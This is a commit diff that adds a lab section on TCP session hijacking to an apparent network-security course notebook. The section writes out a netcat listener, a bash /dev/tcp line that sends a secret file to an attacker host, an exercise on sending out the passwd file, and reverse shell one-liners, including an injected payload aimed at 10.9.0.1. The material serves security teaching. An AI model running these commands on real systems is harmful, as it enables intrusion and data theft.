update TCP attacks

--- a/course/notebooks/TCPAttacks.ipynb
+++ b/course/notebooks/TCPAttacks.ipynb
@@ -203,7 +203,66 @@
     "- note that the script runs infintely, so it's not a good idea to send the RST packet to server\n",
     "    - only send RST packet to the machine/client you own\n",
     "- this seems to be NOT working on modern streaming sites!\n",
-    "    - could be many reasons: too fast; buffering, reconnection"
+    "    - could be many reasons: too fast; buffering, reconnection by client, etc.\n",
+    "\n",
+    "\n",
+    "## TCP Session Hijacking Attack\n",
+    "\n",
+    "- suppose the attacker miss the opportunity to sniff Telnet username and passwords\n",
+    "- a TCP connection between two hosts can be hijacked by an attacker\n",
+    "- unencrypted connection can be intercepted and packets can be forged without either party knowing about it\n",
+    "- can send bogus commands on behalf of the client to run on the server\n",
+    "\n",
+    "### Launching Attack\n",
+    "- use the `demos/TCP_Attack/docker-compose.yml` setup\n",
+    "- server contains `/home/seed/secret.txt` file with some secret\n",
+    "- attck \n",
+    "- attacker uses `volumes/sniff_telnet.py` script to sniff Telnet packet\n",
+    "- Note source and destination port, source and destination ips and ack number from most recent packet\n",
+    "    - these info required in session_hijack.py file\n",
+    "- make sure `user1` or `user2` connects to `server` using telnet\n",
+    "- run `/volumes/session_hijack.py` to inject command to exfiltrate data\n",
+    "\n",
+    "\n",
+    "### Some useful NC commands\n",
+    "- start a NC server on the attacker machine\n",
+    "```bash\n",
+    "nc -lnv 9090\n",
+    "```\n",
+    "- run the following command on the server machine\n",
+    "```bash\n",
+    "cat /home/seed/secret.txt > /dev/tcp/<host>/<port>\n",
+    "```\n",
+    "- bash cats the contents and redirects to virutal file\n",
+    "- bash makes a TCP connection to `<host>` at port `<port>`\n",
+    "- `/dev/tcp`, `/dev/udp` are special keywords interpreted by bash\n",
+    "    - Note other shells may not understand these keywords!\n",
+    "\n",
+    "\n",
+    "### Exercise\n",
+    "- can you send the contents of server's passwd file to the attacker?\n",
+    "\n",
+    "\n",
+    "## Creating Reverse Shell\n",
+    "- instead of running *cat*, we can run a shell program on the server\n",
+    "- instead of using local standard input and output to execute the shell command and see the results, we can use a TCP connection for both input and output of the shell\n",
+    "- such a shell is called *reverse shell**\n",
+    "- **0**, **1**, and **2** are standard input, output and error streams on *nix systems\n",
+    "- redirect the standard output to `/dev/tcp/...` for bash command\n",
+    "- redirect the standard error to standard ouput stream which redirects to `/dev/tcp...`\n",
+    "- use `/dev/tcp...` for the standard input as well \n",
+    "\n",
+    "```bash\n",
+    "/bin/bash -i > /dev/tcp/<host>/<port>\n",
+    "/bin/bash -i > /dev/tcp/<host>/<port> 2>&1\n",
+    "/bin/bash -i > /dev/tcp/<host><port> 2>&1 0<&1\n",
+    "```\n",
+    "- simply change the data to the following to get a reverse shell on the Telnet server\n",
+    "```txt\n",
+    "data = \"\\r /bin/bash -i > /dev/tcp/10.9.0.1/9090 2>&1 0<&1 \\r\"\n",
+    "```\n",
+    "- rerun the expirement and see if you get a reverse shell\n",
+    "\n"
    ]
   },
   {
